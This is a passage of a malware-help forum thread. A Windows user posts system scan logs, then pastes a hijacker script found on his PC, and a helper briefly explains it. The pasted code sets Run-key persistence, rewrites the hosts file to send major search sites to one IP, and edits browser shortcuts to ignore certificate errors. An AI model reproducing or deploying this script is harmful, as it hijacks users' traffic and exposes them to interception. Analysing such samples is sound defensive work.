[2015/01/23 12:52:03 | 000,148,396 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2015/01/23 12:46:07 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2015/01/23 08:13:31 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2015/01/23 00:22:00 | 000,000,932 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job
[2015/01/22 21:11:30 | 000,097,496 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2015/01/22 20:55:37 | 000,701,616 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2015/01/22 20:55:37 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2015/01/22 19:22:00 | 000,000,880 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2015/01/22 11:23:36 | 000,037,624 | ---- | M] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2015/01/22 00:02:51 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini
[2015/01/20 16:15:27 | 000,000,958 | ---- | M] () -- C:\Users\Tom Jones\Desktop\Android Studio.lnk
[2015/01/16 22:23:19 | 000,002,356 | ---- | M] () -- C:\Users\Tom Jones\Desktop\Google Chrome.lnk
[2015/01/06 13:14:01 | 000,000,600 | ---- | M] () -- C:\Users\Tom Jones\AppData\Local\PUTTY.RND
[1 C:\Program Files (x86)\*.tmp files -> C:\Program Files (x86)\*.tmp -> ]

========== Files Created - No Company Name ==========

[2015/01/22 00:02:50 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini
[2015/01/21 22:33:15 | 000,037,624 | ---- | C] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2015/01/20 16:15:27 | 000,000,958 | ---- | C] () -- C:\Users\Tom Jones\Desktop\Android Studio.lnk
[2014/10/05 15:08:05 | 000,000,057 | ---- | C] () -- C:\Users\Tom Jones\.gitconfig
[2014/10/05 14:55:06 | 000,001,833 | ---- | C] () -- C:\Users\Tom Jones\.bash_history
[2014/07/01 00:29:30 | 000,000,396 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/05/29 16:14:15 | 000,008,192 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/12/20 23:51:16 | 000,000,212 | ---- | C] () -- C:\Windows\ildasmfnt.bin
[2013/07/20 00:48:09 | 002,580,552 | R--- | C] () -- C:\Windows\SysWow64\pbsvc.exe
[2013/07/01 18:05:35 | 000,000,001 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\llftool.4.30.agreement
[2013/04/16 22:52:23 | 000,000,322 | ---- | C] () -- C:\Users\Tom Jones\configuration_log.csv
[2012/10/07 15:51:26 | 000,000,600 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\PUTTY.RND
[2012/03/26 17:26:16 | 000,007,602 | ---- | C] () -- C:\Users\Tom Jones\AppData\Local\resmon.resmoncfg

========== ZeroAccess Check ==========

[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 21:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 20:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 22:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/13 20:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

========== LOP Check ==========

[2014/11/20 23:45:39 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\.emacs.d
[2014/08/26 23:14:19 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\.mono
[2012/03/24 12:24:09 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Auslogics
[2014/01/26 02:06:42 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\BSplayer PRO
[2014/03/19 11:05:16 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\com.valve.FTP
[2014/05/03 16:31:45 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\FileZilla
[2014/01/21 20:36:22 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\iFunbox_UserCache
[2013/02/03 03:07:13 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Immunity Debugger
[2012/03/24 07:32:39 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Leadertech
[2014/03/08 00:15:05 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Mael
[2013/10/26 00:03:48 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Milestone
[2015/01/20 23:10:21 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MiniLyrics
[2012/05/30 21:01:56 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MotioninJoy
[2014/09/07 17:40:03 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Motorola
[2014/09/07 16:47:38 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Motorola Mobility
[2013/04/28 22:49:07 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Mumble
[2014/04/01 11:52:05 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\MySQL
[2014/03/16 19:16:38 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\NetBeans
[2014/08/27 18:25:54 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Notepad++
[2013/12/21 00:41:29 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\NuGet
[2014/10/10 09:51:25 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\OfficeRecovery
[2014/02/22 12:56:28 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Oracle
[2013/07/21 18:41:06 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Origin
[2012/10/26 16:42:46 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\redsn0w
[2014/09/16 22:55:54 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Sony
[2014/12/07 18:45:15 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\SSH
[2014/08/26 23:14:03 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Steam
[2014/04/26 14:07:24 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Sublime Text 3
[2012/11/20 15:05:01 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\SystemRequirementsLab
[2014/04/27 22:14:02 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\TeamViewer
[2013/02/05 04:31:48 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\TightVNC
[2012/05/20 03:19:59 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\Ubisoft
[2015/01/22 20:59:07 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\uTorrent
[2013/12/20 23:53:18 | 000,000,000 | ---D | M] -- C:\Users\Tom Jones\AppData\Roaming\VisualAssist

========== Purity Check ==========

========== Custom Scans ==========

< C:\Users\*.vbs /S >
[2009/07/14 00:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009/07/14 00:08:49 | 000,032,624 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2013/10/12 14:32:49 | 000,000,880 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2013/10/12 14:32:49 | 000,000,932 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job

< C:\Users\*.bat /S >
[2008/11/29 12:05:58 | 000,000,053 | ---- | M] () -- C:\Users\Tom Jones\Downloads\OC\RealTemp_370\RTShutDown.bat

========== Alternate Data Streams ==========

@Alternate Data Stream - 194 bytes -> C:\ProgramData\TEMP:8927A071

< End of report >

---------------------------------------------------------------------------------------------------------------------

3. New Malwarebytes scan produced:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 1/23/2015
Scan Time: 1:56:15 PM
Logfile:
Administrator: Yes

Version: 2.00.4.1028
Malware Database: v2015.01.23.06
Rootkit Database: v2015.01.14.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Tom Jones

Scan Type: Custom Scan
Result: Completed
Objects Scanned: 821488
Time Elapsed: 1 hr, 2 min, 58 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

tomfullerton · « **Reply #11 on:** January 23, 2015, 10:34:50 PM »

Quote from: tomfullerton on January 23, 2015, 09:22:17 PM

========== Custom Scans ==========

< C:\Users\*.vbs /S >
[2009/07/14 00:08:49 | 000,000,006 | -H-- | C] () -- C:\Windows\Tasks\SA.DAT
[2009/07/14 00:08:49 | 000,032,624 | ---- | C] () -- C:\Windows\Tasks\SCHEDLGU.TXT
[2013/10/12 14:32:49 | 000,000,880 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000Core.job
[2013/10/12 14:32:49 | 000,000,932 | ---- | C] () -- C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-265094073-1043058997-3425087786-1000UA.job

< C:\Users\*.bat /S >
[2008/11/29 12:05:58 | 000,000,053 | ---- | M] () -- C:\Users\Tom Jones\Downloads\OC\RealTemp_370\RTShutDown.bat

========== Alternate Data Streams ==========

@Alternate Data Stream - 194 bytes -> C:\ProgramData\TEMP:8927A071

< End of report >

Regarding this part of the scan, where you try to search any file that ends in .vbs or .bat, I don't think the file I was referring to will show up since it had NO extension. I had to manually change it to .txt in order to be able to attach it here.

Please take a look at it if you can, it's just a text file that I think would be called from somewhere else and then after execution as a .bat file some other program may have renamed it, i.e. remove the extension altogether.

-attached it.

tomfullerton · « **Reply #12 on:** January 24, 2015, 06:28:49 AM »

Does anyone around here have any clue what this script is doing?
-This was a file without an extension, found in C:\Users\
Please let me know even if you know a bit of it.

Code: [Select]

@echo off Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat3" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys32.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat4" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Sys33.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat1" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Macrosoft.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat2" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Systm.vbs" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "appdat" /t REG_SZ /F /D "C:\Users\Tom Jones\AppData\Roaming\Windaws.bat" Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /V "Start Page" /D "http://www.google.com" /F Jones\AppData\Roaming\Windaws.bat
REG ADD "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HomePage /t REG_DWORD /d 1 /f Jones\AppData\Roaming\Windaws.bat
cd /D "%APPDATA%\Mozilla\Firefox\Profiles" Jones\AppData\Roaming\Windaws.bat
cd *.default Jones\AppData\Roaming\Windaws.bat
set buzaar=%cd% Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.newtab.url", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
echo user_pref("browser.startup.homepage", "http://www.google.com");>>"%buzaar%\prefs.js" Jones\AppData\Roaming\Windaws.bat
set buzaar= Jones\AppData\Roaming\Windaws.bat
cd %windir% Jones\AppData\Roaming\Windaws.bat
set bugalatasligala=%windir%\System32\drivers\etc\hosts Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com" %bugalatasligala% || echo 69.162.120.131 www.google.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.bing.com" %bugalatasligala% || echo 69.162.120.131 www.bing.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.uk" %bugalatasligala% || echo 69.162.120.131 www.google.co.uk>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.ca" %bugalatasligala% || echo 69.162.120.131 www.google.ca>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.com.tr" %bugalatasligala% || echo 69.162.120.131 www.google.com.tr>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 isearch.babylon.com" %bugalatasligala% || echo 69.162.120.131 isearch.babylon.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.conduit.com" %bugalatasligala% || echo 69.162.120.131 search.conduit.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.yahoo.com" %bugalatasligala% || echo 69.162.120.131 www.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 us.yhs4.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 us.yhs4.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 r.search.yahoo.com" %bugalatasligala% || echo 69.162.120.131 r.search.yahoo.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.aol.com" %bugalatasligala% || echo 69.162.120.131 www.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.aol.com" %bugalatasligala% || echo 69.162.120.131 search.aol.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.comcast.net" %bugalatasligala% || echo 69.162.120.131 search.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.google.co.in" %bugalatasligala% || echo 69.162.120.131 www.google.co.in>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 www.ask.com" %bugalatasligala% || echo 69.162.120.131 www.ask.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 xfinity.comcast.net" %bugalatasligala% || echo 69.162.120.131 xfinity.comcast.net>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
find "69.162.120.131 search.avg.com" %bugalatasligala% || echo 69.162.120.131 search.avg.com>>%bugalatasligala% Jones\AppData\Roaming\Windaws.bat
exit Jones\AppData\Roaming\Windaws.bat
SET wsc = WScript.CreateObject("WScript.Shell") Jones\AppData\Roaming\Systm.vbs
SET fso = WScript.CreateObject("Scripting.FileSystemObject") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK")) Then Jones\AppData\Roaming\Systm.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK") Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) Then Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
else Jones\AppData\Roaming\Systm.vbs
bozcaada.targetpath = "C:\Program Files\Google\Chrome\Application\chrome.exe" Jones\AppData\Roaming\Systm.vbs
End If Jones\AppData\Roaming\Systm.vbs
bozcaada.Arguments = "http://www.google.com -ignore-certificate-errors --disable-show-modal-dialog --disable-infobars" Jones\AppData\Roaming\Systm.vbs
bozcaada.save() Jones\AppData\Roaming\Systm.vbs
End If 'uz Jones\AppData\Roaming\Systm.vbs
If (fso.FileExists(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys33.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("AppData") & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists("C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) Then Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files (x86)\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.targetpath = "C:\Program Files\Mozilla Firefox\firefox.exe" Jones\AppData\Roaming\Sys33.vbs
bozcaada.Arguments = "http://www.google.com" Jones\AppData\Roaming\Sys33.vbs
End If 'ez Jones\AppData\Roaming\Sys33.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK")) Then Jones\AppData\Roaming\Sys32.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Mozilla Firefox.LNK") Jones\AppData\Roaming\Sys32.vbs
End If 'oz Jones\AppData\Roaming\Sys32.vbs
If (fso.FileExists(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK")) Then Jones\AppData\Roaming\Macrosoft.vbs
SET bozcaada = wsc.CreateShortcut(wsc.SpecialFolders("desktop") & "\Google Chrome.LNK") Jones\AppData\Roaming\Macrosoft.vbs
End If 'az Jones\AppData\Roaming\Macrosoft.vbs

Curson · « **Reply #13 on:** January 24, 2015, 04:44:22 PM »

Hi tomfullerton,

This script is used to make redirections to IP 69.162.120.131 which is an attempt to impersonate known search sites.
Since you have started a new topic at Bleepingcomputer, please continue with Johnny Computer there.

Regards.

Author Topic: windows/SysWOW64/rundll32.exe halp me ? (Read 16890 times)

tomfullerton

windows/SysWOW64/rundll32.exe halp me ?

Curson

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

Curson

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

Curson

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

tomfullerton

Re: windows/SysWOW64/rundll32.exe halp me ?

Curson

Re: windows/SysWOW64/rundll32.exe halp me ?